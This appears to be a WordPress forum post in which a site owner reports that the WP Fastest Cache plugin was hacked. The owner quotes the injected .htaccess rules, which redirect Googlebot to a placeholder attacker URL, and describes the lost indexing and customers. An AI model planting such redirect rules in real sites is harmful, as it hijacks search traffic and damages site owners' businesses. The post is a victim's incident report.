I’m sure becase I’ve test it before write this comment.
When I update the plugin .htaccess file stop changing with the hack url.
Hello last week my website WP Fastest Cache plugin is been hacked and .htaccess file changed to:
# BEGIN WpFastestCache
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} Googlebot
RewriteRule (.*) http://www.hackerurl.com [L,R=301]
The result was the User-declared canonical in google console change to http://www.hackerurl.com and my domain wasn’t indexed by google.
So I found that it was the WpFastestCache plugin.
After that I update the plugin today and I hope not happent again because it was my bussiness website and cost me some customers.
-
This reply was modified 5 years, 6 months ago by qstudios.